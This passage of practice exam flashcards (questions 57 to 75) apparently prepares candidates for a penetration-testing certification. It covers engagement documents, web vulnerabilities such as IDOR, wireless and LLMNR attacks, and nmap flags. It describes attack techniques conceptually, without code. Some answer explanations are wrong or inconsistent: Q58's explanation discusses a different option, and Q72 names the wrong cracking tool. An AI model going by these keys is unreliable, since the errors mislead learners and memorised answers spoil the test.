Rules of engagement is incorrect because the rules of engagement (ROE) document dictates guidelines and restraints that are to guide the penetration tester(s) during the assessment, most critically detailing what is and is not authorized for testing. The ROE may be delivered on its own or as a component of the SOW.

57
Q
An organization's \_\_\_\_\_\_\_\_\_\_ determines if it is financially possible to support a penetration test.
A.Budget
B.Technical constraints
C.Timeline
D.Industry type
A

A.Budget

Explanation
Correct Answer:

Budged is correct. The organizational budget dictates whether a penetration test is financially supportable.

Incorrect Answers:

Timeline is incorrect because an organization’s timeline helps determine when a penetration test is feasible. Technical constraints is incorrect because the technical constraints of an organization detail specific technological challenges that could significantly impact an organization, such as mission-critical hosts or delicate legacy equipment that is scheduled for replacement. This information is often used as part of a business’s decision-making process when determining what systems or networks are in or out of scope for a penetration test.

Industry types is incorrect because an organization’s industry type may help determine the type of penetration testing required (for instance, compliance-based testing in the event of organizations handling payment cards or patient health information in a hospital) but will not ultimately determine the financial possibility of a penetration test.

58
Q

Dynamic and runtime analysis (or dynamic application security testing, or DAST) is an implementation of black box testing methodology used when evaluating the efficacy of security measures employed by an application, performed by investigating the application in its running state. Which of the following is not a typical test case or action taken during DAST?
A.Evaluation of shared application data storage
B.Brute-force attack attempts against a PIN or pattern lock
C.Evaluation of the use of customer encryption protocols and configurations
D.Binary attacks aimed at privilege escalation

A

B.Brute-force attack attempts against a PIN or pattern lock

Explanation
Brute-force attack attempts against a PIN or pattern lock is correct. Evaluation of the use custom encryption protocols and configurations is a test case that is employed in static application security testing (or SAST).

Incorrect Answer:

The other answers are incorrect because these tests are typical of DAST. The question asks which example is not a typical test case during DAST, so these are incorrect answers.

59
Q

During a penetration test, you create a new administrative user on a system for which you have obtained SYSTEM-level access in order to maintain a persistent presence on the server in question. Which of the following actions would be appropriate for post-engagement cleanup of this account?
A.Change the account name to “determine” and notify the client of the change in your report
B.Change the account password to a randomly generated 128-character string and notify the client of the change in your report
C.Disable the account
D.Delete the account

A

D.Delete the account

Explanation
Correct Answer:

Delete the account is correct. As a rule of thumb, if a change made to a system during the course of a penetration test would leave a system vulnerable, the change should be reverted, wherever possible, and always reported. In the scenario described in the question, for instance, the user account described should be deleted. Note that there are caveats to this, however: for example, log files that may have captured evidence of your actions should be left intact, as they can provide the client’s defenders valuable information for refining their detection and alerting processes.

Incorrect Answers:

The other choices are incorrect. Changing the account password and username as well as disabling the account are only further modifications to an existing change made during the course of a penetration test. Changes made to a system during the course of a penetration test that introduce vulnerability should be reverted, wherever possible, not simply changed further. As such, these are incorrect answers.

60
Q
During a penetration test, you discover that HTTP parameters are contained in the URL in plaintext with no obfuscation in a web application. You find that by changing the "?OrderNumber=12345" component of the URL to "?OrderNumber=XXXXX", you are able to gain access to orders you would not otherwise be able to see. This is an example of what type of vulnerability?
A.HTTP paramter pollution
B.Persistent XSS
C.Insecure direct object reference
D.Unvalidated redirection
A

C.Insecure direct object reference

Explanation
Correct Answer:

Insecure direct object reference is correct. The vulnerability in question is an example of an insecure direct object reference, and is shown through two facts: First, the use of a query (denoted by the “?” operator) tells us that the browser is sending the information that follows to the web server. Second, the use of the term “OrderNumber” in plaintext with a simple five-digit value suggests that the web server simply takes a client’s word for it when they say they have authorization to view a file. This class of vulnerability is best remedied by validating private object references and verifying authorization to all such referenced objects.

Incorrect Answers:

HTTP parameter pollution is incorrect because HTTP parameter pollution would consist of sending specially crafted HTTP requests that contain multiple instances of an HTTP parameter with different values for the purpose of fuzzing a website or web application. HTTP parameter pollution is typically a complex enough issue to require manual testing, and different web servers will handle multiple identically named HTTP parameters differently. The results of parameter pollution can range from simple error messages to authentication or input validation bypasses.

Unvalidated redirection is incorrect because the vulnerability described in the question produces information disclosure on the same website rather than redirecting the user to a different, malicious site. Unvalidated redirection would require that an attacker craft a malicious link to the vulnerable site, which then redirects the victim to a site of the attacker’s choosing, typically for the purpose of a phishing campaign or XSS attack.

Persistent XSS is incorrect because the vulnerability described does not result in malicious code being served by the hosting server, as persistent XSS occurs when malicious code is embedded into a website that is visited by the victim. Additionally, persistent XSS targets the information held in the visitor’s browser (by getting the user to transfer information such as session tokens or other sensitive information) rather than the web server itself.

61
Q
A component of the aircrack-ng suite of tools, which command-line tool is a wireless sniffing tool that can be used to discover and validate potential wireless targets?
A.Airbase-ng
B.Kismet
C.Airmon-ng
D.Airodump-ng
A

D.Airodump-ng

Explanation
Correct Answer:

Airodump-ng is correct. Airodump-ng is a command-line based, wireless sniffing tool that can be used to discover and validate potential wireless targets.

Incorrect Answers:

Kismet is incorrect because Kismet is a separate tool and is not a component of the aircrack-ng suite.

Airmon-ng and airbase-ng are incorrect because while airmon-ng and airbase-ng are components of the aircrack-ng suite, airmon-ng serves to place wireless network devices in monitor mode, and airbase-ng is a tool used for attacking clients rather than the access point itself.

62
Q
Android is an open-source operating system developed by Google and based on what operating system family?
A.Linux
B.NP-UX
C.,Windows
D.AIX
A

A.Linux

Explanation
Correct Answer:

Linux is correct. Android is a mobile operating system created originally by Google, with ongoing development by Google and the Open Handset Alliance. More recent devices (circa 2017) use version 3.18 or 4.4 of the Linux kernel.

Incorrect Answers:

AIX and HP-UX are incorrect because AIX and HP-UX are Unix variants for servers; iOS is based on Darwin, which is a Unix variant.

Windows is incorrect because Windows Phone was the most recent variant of Windows developed primarily for mobile platforms; it has since been discontinued due to a lack of developer interest and market penetration.

63
Q

RTOSs are operating systems found in certain types of embedded devices. Which of the following are common weaknesses that affect RTOSs? (Choose two.)
A.Delay from vendors implementing upstream package updates in their own repositories
B.Difficulty of patching (typically requiring a firmware update rather than a relatively simple package installation)
C.Embedded web applications with hard-coded default credentials
D.FIndings a time to deploy package updates that is not invasive to business operations

A

B.Difficulty of patching (typically requiring a firmware update rather than a relatively simple package installation)
C.Embedded web applications with hard-coded default credentials

Explanation
Correct Answer:

Embedded web applications with hard-coded default credentials and difficulty of patching (typically requiring a firmware update rather than a relatively simple package installation) are correct. RTOSs often feature websites or web applications that run with hard-coded default credentials and are difficult to update due to the requirement for a firmware update to make changes to the operating system.

Incorrect Answers:

Delay from vendors implementing upstream package updates in their own repositories is incorrect because a delay in implementing upstream package updates is an issue that can affect all operating systems, not just RTOSs.

Finding a time to deploy package updates that is not invasive to business operations is incorrect for much the same reason: the patching and updating of systems and software is a stressful procedure for most businesses, often requiring the sanction of a change-approval board (CAB). The reasons for this caution vary widely, but a common grievance among businesses is the hesitation to introduce new code that, while a net good for system security and the protection of company intellectual property, may break production systems that previously ran without issue, effectively losing the company money through lost productivity.

64
Q
Of the following options, which contractual document would contain specific payment terms and details?
A.Nondisclousre agreement
B.Statement of work
C.Written authorization letter
D.Rules of engagement
A

B.Statement of work

Explanation
Correct Answer:

Statement of work is correct. Of the answers available for this question, statement of work is the only correct choice. It is worth noting that payment information may also be detailed in the master service agreement (MSA).

Incorrect Answers:

Rules of engagement is incorrect because the rules of engagement (ROE) are the concrete guidelines and limitations to be observed during the execution of a penetration test.

Nondisclosure agreement is incorrect because a nondisclosure agreement (NDA) is a confidentiality agreement that protects the proprietary information and intellectual property of a business.

Written authorization letter is incorrect because a written authorization letter is a document typically provided as part of the ROE for a penetration test that explicitly details the client organization’s authorization of the assessment to be conducted. This document is a mission-critical piece of legal protection for a penetration tester; without it, one could theoretically be exposed to laws that criminalize the unauthorized access of computer systems for example, the Computer Fraud and Abuse Act (CFAA) in the United States.

65
Q
LAN Manager (LM) and NT LAN Manager (NTLM) hashes are used to store passwords in which operating system family?
A.Linux
B.HP-UX
C.Windows
D.Solaris
A

C.Windows

Explanation
Correct Answer:

Windows is correct. LM and NTLM hashes are used by Windows operating systems to store user passwords.

Incorrect Answers:

The other choices are incorrect because Solaris, Linux, and HP-UX are all *nix-type operating systems that store user passwords in the /etc/shadow file using a different password-hashing algorithm such as Blowfish or bcrypt.

66
Q
What is the typical goal of LLMNR or NBT-NS poisoning attacks?
A.Password collection
B.Disruption of LLMNR services
C.Destructuib if existing LLMNR records
D.Interception of traffic data
A

A.Password collection

Explanation
Correct Answer:

Password collection is correct. LLMNR is a multicast, local network only, name resolution service that queries all hosts on a given local link for a particular host as well as accepts the first response it receives as an authoritative source. If the victim is attempting to access a resource that requires authentication, it will then send an NTLM hash to the attacking system, which can then be cracked offline to harvest passwords.

Incorrect Answers:

Interception of traffic data is incorrect because the key target is the victim’s username and password, rather than the traffic they intended to send.

Disruption of LLMNR services is incorrect because disruption of LLMNR would require an attack on the entire network, as it is a protocol that communicates via multicast (that is, by sending requests to all hosts on a given network).

Destruction of existing LLMNR records is incorrect because LLMNR by its nature does not have records in the traditional sense; instead, it relies on the assumption that all servers identify themselves honestly and accurately. This inherent trust makes LLMNR vulnerable to exploitation by simply claiming to be the system or resource the victim is attempting to access.

67
Q

What is the effect of the -PU flag in nmap?
A.Triggers TCP SYN discovery to named ports
B.Triggers TCP ACK discovery to named ports
C.Triggers SCTP discovery to named ports
D.Triggers UDP discovery to named ports

A

D.Triggers UDP discovery to named ports

Explanation
Correct Answer:

Triggers UDP discovery to named ports is correct. The -PU flag is used for UDP discovery of declared ports.

Incorrect Answers:

Triggers SCTP discovery to named ports is incorrect because SCTP discovery is the result of the -PY flag.

Triggers TCP ACK discovery to named ports is incorrect because TCP ACK discovery is the result of the -PA flag.

Triggers TCP SYN discovery to named ports is incorrect because TCP SYN discovery is the result of the -PS flag.

68
Q

Of the following options, in which section of a penetration test report would one expect to find a granular breakdown of evidence collected from a social engineering campaign conducted during a penetration test, including an anonymized statistical count of users who opened e-mails or clicked links?

A.Appendixes
B.TImeline
C.Executive summary
D.MEthodlogy

A

A.Appendixes

Explanation
Correct Answer:

Appendixes is correct. Nestled in the conclusions of a penetration test, appendixes contain additional supporting information from a penetration test that is not crucial to understanding the findings thereof. Evidence collected from a phishing campaign (such as an anonymized statistical breakdown of the number of users who opened e-mails and attachments or who clicked links to web pages as posited in the question) would be an example of this sort of detailed information.

Incorrect Answers:

Methodology is incorrect because the methodology section of a penetration test report focuses on explaining testing techniques and practices used, in addition to the decision-making processes that guided information collection and analysis. In the context of a social engineering campaign, this would largely focus on the sources of information used (whether tool based, such as the harvester, or via manual collection methods, such as review and monitoring of social media accounts). Since the actual evidence collected goes beyond this explanation of information collection methods, this answer is incorrect.

Executive summary is incorrect because the executive summary provides a high-level overview of the findings of a penetration test report, typically written specifically for nontechnical personnel. Since a granular list of evidence, tool output, and phishing campaign details would necessarily get into technical aspects, this would be outside of the scope of an executive summary, making it incorrect.

Timeline is incorrect because the timeline is a component of the executive summary that lays out the sequence of events of a penetration test, from the initial signing of the rules of engagement (ROE) to delivery of the penetration test report. As with the executive summary, a detailed list of evidence collected during a social engineering campaign would be outside of the purview of this section, making this answer incorrect.

69
Q
Consider the following nmap output: ``` # Ports scanned: TCP(10;21-23,25,80,110,139,443,445,3389) UDP(0;) SCTP(0;) PROTOCOLS(0;) Host: 10.1.2.3 () Status: Up Host: 10.1.2.3 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///, 25/open/tcp//smtp///, 80/open/tcp//http///, 110/closed/tcp//pop3///, 139/open/tcp//netbios-ssn///, 443/closed/tcp//https///, 445/open/tcp//microsoft-ds///, 3389/closed/tcp//ms-wbt-server/// OS: Linux 2.6.9 - 2.6.33 Seq Index: 198 IP ID Seq: All zeros # Nmap done at Sat May 12 09:41:47 2018 -- 1 IP address (1 host up) scanned in 14.49 seconds ``` Based on the scan output, which of the following scan flags was most likely run?
A.'-sY'
B.'-sS'
C.'-sU'
D.'-sC'
A

B.’-sS’

Explanation
Correct Answer:

-sS’ is correct. This scan would have been collected with a TCP SYN scan (sometimes called a stealth scan), given the options present. The first line of the sample shows how many ports were scanned and which type of scan was used for them. In this case, 10 ports were scanned with TCP, 0 with UDP, and 0 with SCTP. With that information, we can determine that -sS is the correct answer.

Incorrect Answers:

‘-sY’ and ‘-sU’ are incorrect because although the -sY and -sU flags modify the type of scan being conducted, the output makes clear that neither an SCTP scan nor a UDP scan was conducted here.

‘-sC’ is incorrect because we see no NSE data embedded in the output, which means -sC could not have been invoked in this scan.

70
Q
Developed by Rapid7, which commercially available vulnerability scanner features a web-based user interface and allows users to execute both credentialed and noncredentialed scans?
A.Nexpose
B.OpenVAS
C.Nikto
D>W3AF
A

A.Nexpose

Explanation:
Nexpose is correct. Nexpose is developed by and available from Rapid7 and sports multiple features, such as remediation reports and integration with Metasploit Pro.

Incorrect Answers:

Nikto is incorrect because Nikto is a command-line-only website and web application scanner developed by Chris Sullo and David Lodge.

W3AF is incorrect because W3AF (the Web Application Attack and Audit Framework) is an open-source, Python-based web application scanner developed by Andres Riancho and numerous contributors and sponsors.

OpenVAS is incorrect because OpenVAS is an open-source vulnerability scanner composed of several various services and tools, rather than strictly a website and web application scanner.

71
Q

A patch management plan would be the best remediation for which of the following findings in a penetration test?
A.Unnecessaily open services discovered on systems owned by the organization
B.Weak password requirements within an organizations federated logon system
C.SQL injection discovered on a critical business web application
D.Inconsistent deployment of software versions from OS vendors on an organizations servers

A

D.Inconsistent deployment of software versions from OS vendors on an organizations servers

Explanation
Correct Answer:

Inconsistent deployment of software versions from OS vendors on an organization’s servers is correct. Inconsistency in patch levels deployed across servers in an organization’s network is a classic example of the sort of issue that is best remedied by an effective patch management plan, which is often a component of an organization’s change management program. Effective patch management can provide numerous benefits to organizations, including cost management, reduced turnaround time for patch deployment, and a comprehensive record of changes made to systems in the organization’s environment.

Incorrect Answers:

Weak password requirements within an organization’s federated logon system is incorrect because a patch management plan would have no impact on password requirements within an organization. The best fix for this scenario would be an effective password requirement list.

Unnecessarily open services discovered on systems owned by the organization is incorrect because while patch management can prevent packages from being changed or installed on systems and servers unnecessarily, it cannot do anything for services or tools that are provided by packages already present. As such, the best solution for this finding is system hardening.

SQL injection discovered on a critical business web application is incorrect because patch management would have no functional impact on web applications and other services that are vulnerable to SQL injection attacks. The best solution for this class of finding is the use of parameterized queries.

72
Q
During a penetration test, you determine that a wireless network in your scope is running WEP encryption. Unfortunately, there are no actively connected clients transmitting data, but the access point allows open authentication. Which of the following would be the method of attack to ultimately obtain the encryption key?
A.Pixie dust attack
B.Fragmenetation attack
C.KRACK
D.Reaver attack
A

B.Fragmenetation attack

Explanation
Correct Answer:

Fragmentation attack is correct. Like the ChopChop attack, fragmentation attacks are used to obtain an XOR file; the XOR file is not the encryption key but may be used to create packets for injection into the network. A fragmentation attack repeatedly pulls fragments of the keystream from occasional packets sent by the access point. Because some of the contents of a packet are predictable to a degree (due to headers), a small portion of the keystream may be obtained by XOR-ing. This small piece of keystream may then be used to inject fragments of arbitrary data, allowing the attacker to repeat the attack and recover more of the keystream. Over a long enough time period, a complete XOR file can be built, allowing for arbitrary packet injection. At this point, the attacker can send arbitrary data to the AP (such as ARP request packets), which the AP will relay out. The attacker can collect these packets to obtain sufficient initialization vectors (IVs) to ultimately crack the WEP key with aireplay-ng. The project page for aircrack-ng has an excellent guide for this attack method; at the time of this writing, it may be found at https://aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients.

Incorrect Answers:

KRACK is incorrect because KRACK (or the Key Reinstallation AttaCK) is a replay attack technique that targets WPA2. By spoofing a portion of an authenticated system’s four-way handshake, an attacker is able to trick the AP and client into resetting their key data to known values, effectively causing reuse of cryptographic information. Because cryptographic information is being reused, the contents of packets are then vulnerable to decryption, allowing an attacker to view potentially sensitive information.

Pixie dust attack is incorrect because a pixie dust attack is another attack focused on WPA2 and its use of Wi-Fi Protected Setup (WPS). Since the seed values of WPS are often simple to guess or known values based on published research, the attacker can simply sniff traffic for a period of time to be able to decrypt the WPS pin and password, allowing access to the AP.

Reaver attack is incorrect because a reaver attack is another WPA2 attack targeting WPS. Here, the eight-digit PIN is simply guessed via brute force.

73
Q
A client has specifically requested an assessment of a web application they use for online order management. Because they want a high level of detail provided so as to guide further development and refinement of the application, they have provided two sets of credentials one mapped to an end user and the other to an application administrator in addition to copies of the source code for the application. What testing methodology or strategy is most likely desired by this client?
A.Gray box
B.Red team
C.White box
D.Black box
A

C.White box

Explanation
Correct Answer:

White box is correct. The need for full access to the application as both a user and an administrator, in addition to being provided source code for the application in question, is a clear sign that the client requires an in-depth assessment. As such, white box testing is the most correct answer.

Incorrect Answer:

Black box and gray box are incorrect because black box and gray box tests are not provided with the volume of information indicated in the question. Neither of these choices would be expected to be provided with application source code or valid user or administrative credentials.

Red team is incorrect because a red team-type test is one wherein the penetration testers seek to emulate a real-world attack on a target environment; organizations are not in the habit of providing valid credentials of any sort or source code to hostile agents. Furthermore, note that the question addressed testing methodology, and not the type of assessment being conducted. Close reading of questions to weed out answers like these will be critical during the exam.

74
Q

Spanning Tree Protocol is a link layer network protocol that ensures there are no switching loops in a series of connected Layer 2 networks. Triggering repeated election broadcasts can prevent hosts on the network from requesting information needed for legitimate communications, as all their bandwidth is ultimately absorbed in nominating root bridges for the local link. Why is this not an avenue of attack that should be considered by a penetration tester?
A.The technique effectively halts testing of any furthers targets, thereby preventing the penetration tester from fully accessing the target network or the related goals, such as privilege escalation or lateral movement
B.Denial of service methods often only last as long as the attach focuses their resources on the attack, essentially wasting billable hours that could be better spent performing other tasks
C.All of the answers are correct
D.Denial of service attacks are destructive, focusing solely on disruption of legitimate use of services which can effectively halt business operations for a client organization

A

C.All of the answers are correct

Explanation
All of the answers are correct. Each of the answers listed details a different reason that this attack vector (and more broadly, DoS attacks in general) is ill-advised without extensive coordination with the client. Denying service to others also necessarily involves denying service to yourself as a penetration tester, preventing you from conducting any further activities that would achieve the goals of the penetration test. In addition, these efforts are often time sinks that consume valuable testing time that could be spent trying to find another means of ingress to a target network. Arguably most important, however, is the fact that DoS attacks can halt legitimate business activity on client networks and systems. Penetration testing should be conducted with the aim of identifying and verifying vulnerabilities, rather than simply exploiting vulnerabilities for its own sake without regard to the client’s need to conduct business during the penetration test. In the case of DoS vulnerability testing and verification, it should generally be conducted only when explicitly called for in the RoE, or in close coordination with the client through the listed point of contact. Otherwise, it is generally best to simply document the vulnerability and press on to other issues.The other choices are incorrect as individual answers. All of these are good reasons not to blindly conduct DoS testing of targets during a penetration test, making them incorrect answers, as “All of the answers are correct” is the best fit for this question.

75
Q

Consider the following nmap output:

# Ports scanned: TCP(10;21-23,25,80,110,139,443,445,3389) UDP(0;) SCTP(0;) PROTOCOLS(0;) Host: 10.1.2.3 () Status: Up Host: 10.1.2.3 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///, 25/open/tcp//smtp///, 80/open/tcp//http///, 110/closed/tcp//pop3///, 139/open/tcp//netbios-ssn///, 443/closed/tcp//https///, 445/open/tcp//microsoft-ds///, 3389/closed/tcp//ms-wbt-server/// OS: Linux 2.6.9 - 2.6.33 Seq Index: 198 IP ID Seq: All zeros # Nmap done at Sat May 12 09:41:47 2018 -- 1 IP address (1 host up) scanned in 14.49 seconds
Of the given options, which nmap flag could produce output in the format shown?

A.’-sV’
B.’-oG’
C.’-sU’
D.’-oN’

A

B.’-oG’

Explanation
Correct Answer:

-oG’ is correct. The sample is in nmap’s grep-able output format, which means the flag used to generate this output is -oG. ‘-oN’ is incorrect because although the -oN flag produces an output file, it produces a file in the standard nmap output format.

Incorrect Answers:

‘-sU’ and ‘-sV’ are incorrect because these options control elements of the scan to be run; the -sU flag tells nmap to scan UDP ports whereas the -sV flag is used to trigger service identification during the scan.